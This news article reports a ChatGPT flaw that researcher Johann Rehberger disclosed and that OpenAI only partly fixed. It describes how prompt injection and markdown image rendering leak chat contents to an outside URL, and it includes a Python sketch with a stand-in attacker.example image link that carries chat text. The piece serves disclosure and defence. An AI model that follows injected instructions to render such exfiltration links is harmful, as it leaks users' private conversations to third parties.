OpenAI says it has fixed a potentially serious ChatGPT flaw - but there could still be problems


A researcher discovered a serious flaw in ChatGPT that allowed details from a conversation to be leaked to an external URL.

When Johann Rehberger attempted to alert OpenAI to the potential flaw, he received no response, forcing the researcher to disclose details of the flaw publicly.

Following the disclosure, OpenAI released safety checks for ChatGPT that mitigate the flaw, though not completely.

A hasty patch

The flaw in question allows malicious chatbots powered by ChatGPT to exfiltrate sensitive data, such as the content of the chat, alongside metadata and technical data.

A secondary method involves the victim submitting a prompt supplied by the attacker, which then uses image markdown rendering and prompt injection to exfiltrate the data.
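The mechanics of this second method can be illustrated with a short sketch. It assumes, hypothetically, that injected instructions cause the model to emit a markdown image whose URL carries chat text in its query string. The host `attacker.example`, the parameter name `q` and the function name are illustrative and not taken from Rehberger's report. The code only shows what a remote server would learn if a client fetched such an image.

```python
import re
from urllib.parse import urlparse, parse_qs

# Matches markdown images of the form ![alt](url)
IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\((\S+?)\)")

def leaked_query_params(markdown: str) -> dict:
    """Map each image host to the query parameters it would receive on fetch."""
    leaks = {}
    for url in IMAGE_PATTERN.findall(markdown):
        parsed = urlparse(url)
        params = parse_qs(parsed.query)
        if params:
            leaks.setdefault(parsed.netloc, {}).update(params)
    return leaks

# Hypothetical model reply after a prompt injection (illustrative only)
reply = "Your move! ![board](https://attacker.example/pixel.png?q=my+secret+note)"
print(leaked_query_params(reply))
```

Because the image is requested automatically when the markdown is rendered, the data reaches the third-party server without the user clicking anything.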

Rehberger first reported the flaw to OpenAI in April 2023 and, in November, supplied more details on how it could be exploited in more devious ways.

Rehberger stated: "This GPT and underlying instructions were promptly reported to OpenAI on November, 13th 2023. However, the ticket was closed on November 15th as 'Not Applicable'. Two follow up inquiries remained unanswered. Hence it seems best to share this with the public to raise awareness."

Rather than continue to pursue an apparently unresponsive OpenAI, Rehberger decided to go public with his discovery, releasing a video demonstration of how his entire conversation with a chatbot designed to play tic-tac-toe was extracted to a third-party URL.

To mitigate this flaw, ChatGPT now performs checks to prevent the secondary method mentioned above from taking place. Rehberger responded to this fix stating, “When the server returns an image tag with a hyperlink, there is now a ChatGPT client-side call to a validation API before deciding to display an image.”
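Rehberger's description points to a check that runs before an image is displayed. OpenAI's validation API is not public, so the following is only a sketch of the general idea, using a hypothetical host allowlist rather than any real endpoint. `ALLOWED_IMAGE_HOSTS` and `is_image_allowed` are made-up names.

```python
from urllib.parse import urlparse

# Hypothetical allowlist; the hosts ChatGPT actually trusts are not stated in the article
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

def is_image_allowed(url: str) -> bool:
    """Return True only for HTTPS image URLs whose host is explicitly allowlisted."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in ALLOWED_IMAGE_HOSTS

def filter_images(urls: list) -> list:
    """Keep only the image URLs that pass the allowlist check."""
    return [u for u in urls if is_image_allowed(u)]
```

A client would call something like `is_image_allowed` on each image URL in a response and skip rendering any that fail, so no request is ever sent to an untrusted domain.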

Unfortunately, these new checks do not fully mitigate the flaw: Rehberger found that ChatGPT still sometimes renders images from arbitrary domains, although such requests only succeed some of the time. While the checks have apparently been implemented on the desktop versions of ChatGPT, the flaw remains viable on the iOS mobile app.

Via BleepingComputer


Benedict has been writing about security issues for over seven years, first focusing on geopolitics and international relations while at the University of Buckingham. During this time he studied for a BA in Politics with Journalism, receiving upper second-class honours, and then continued his studies at postgraduate level, achieving a distinction in MA Security, Intelligence and Diplomacy. Upon joining TechRadar Pro as a Staff Writer, Benedict shifted his focus to cybersecurity, exploring state-sponsored threat actors, malware, social engineering, and national security. Benedict is also an expert on B2B security products, including firewalls, antivirus, endpoint security, and password management.
